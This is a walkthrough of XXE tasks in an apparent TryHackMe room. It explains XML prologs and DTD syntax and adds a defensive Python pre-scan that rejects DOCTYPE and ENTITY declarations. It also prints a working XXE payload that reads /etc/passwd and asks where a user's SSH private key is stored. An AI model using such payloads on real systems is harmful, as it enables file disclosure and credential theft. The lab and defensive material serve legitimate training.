Task 12: XML External Entity
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application’s processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.
Task 13: XML External Entity — eXtensible Markup Language
a) Full form of XML
eXtensible Markup Language
b) Is it compulsory to have XML prolog in XML documents?
No
{<?xml version="1.0" encoding="UTF-8"?>
This line is called the XML prolog; it specifies the XML version and the encoding used in the XML document. It is not compulsory, but it is considered good practice to include it in every XML document.}
c) Can we validate XML documents against a schema?
Yes
{"XML allows validation using DTD and Schema. This validation ensures that the XML document is free from any syntax error."}
d) How can you specify XML version and encoding in XML document?
XML Prolog
Task 14: XML External Entity — DTD
a) How do you define a new ELEMENT?
!ELEMENT
b) How do you define a ROOT element?
!DOCTYPE
c) How do you define a new ENTITY?
!ENTITY
Task 15: XML External Entity — XXE Payload
Payload:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM "file:///etc/passwd">]>
<root>&read;</root>
Submit it on the website running at the machine's IP:
The website is vulnerable to XXE attack and hence it is showing the content of /etc/passwd file.
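The payload above works because the parser honours the DOCTYPE and resolves the external entity declared with SYSTEM. As an added example (not part of the TryHackMe room, and not the room's or any library's own code), the following standard-library Python pre-scans untrusted XML for the declarations from Task 14 before parsing it: expat reports every <!DOCTYPE> and <!ENTITY> it meets, and an entity carrying a system or public identifier is an external one. The function names and the sample documents are constructed for this example.

```python
"""Defensive pre-scan: refuse XML that declares a DTD or an external entity.

Added example, not code from the room. Uses only the standard library:
xml.parsers.expat for the scan, xml.etree for the real parse.
"""
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXML(ValueError):
    """Raised when a document declares a DTD, an entity, or cannot be parsed cleanly."""


def scan_for_dtd(data: bytes) -> list:
    """Return (kind, detail) findings for DOCTYPE / ENTITY declarations in `data`.

    expat calls StartDoctypeDeclHandler for <!DOCTYPE ...> and EntityDeclHandler
    for each <!ENTITY ...> in the internal subset. An entity with a SYSTEM or
    PUBLIC identifier is external, i.e. the kind used to read /etc/passwd above.
    The scan never fetches the referenced resource.
    """
    findings = []
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(("doctype", name))
        if sysid or pubid:
            findings.append(("external-dtd", sysid or pubid))

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if sysid is not None or pubid is not None:
            findings.append(("external-entity", f"{name} -> {sysid or pubid}"))
        else:
            findings.append(("internal-entity", name))

    def refuse_external(context, base, sysid, pubid):
        # Returning 0 tells expat the reference was not handled; the parse aborts
        # instead of the resource (file:///..., http://...) ever being opened.
        return 0

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = refuse_external
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        # Aborted or malformed input is recorded too: the document is not clean.
        findings.append(("parse-error", str(exc)))
    return findings


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse `data` only if the pre-scan found no DTD, entity or parse error."""
    findings = scan_for_dtd(data)
    if findings:
        raise UnsafeXML(findings)
    return ET.fromstring(data)


# Constructed samples: the room's payload and a harmless document with a prolog.
XXE_PAYLOAD = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE root [<!ENTITY read SYSTEM "file:///etc/passwd">]>\n'
    b"<root>&read;</root>"
)
BENIGN_DOC = b'<?xml version="1.0" encoding="UTF-8"?><root><user>falcon</user></root>'

if __name__ == "__main__":
    print(scan_for_dtd(XXE_PAYLOAD))
    print(parse_untrusted(BENIGN_DOC).find("user").text)
```

In practice the application should simply reject any document with findings; the list is kept so that a logging or WAF layer can record which entity pointed where.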
Task 16: XML External Entity — Exploiting
c) What is the name of the user in /etc/passwd
falcon
d) Where is falcon’s SSH key located?
/home/falcon/.ssh/id_rsa
{By default, the private key is stored in ~/.ssh/id_rsa and the public key is stored in ~/.ssh/id_rsa.pub}
e) What are the first 18 characters of falcon's private key?
Use payload:
Output: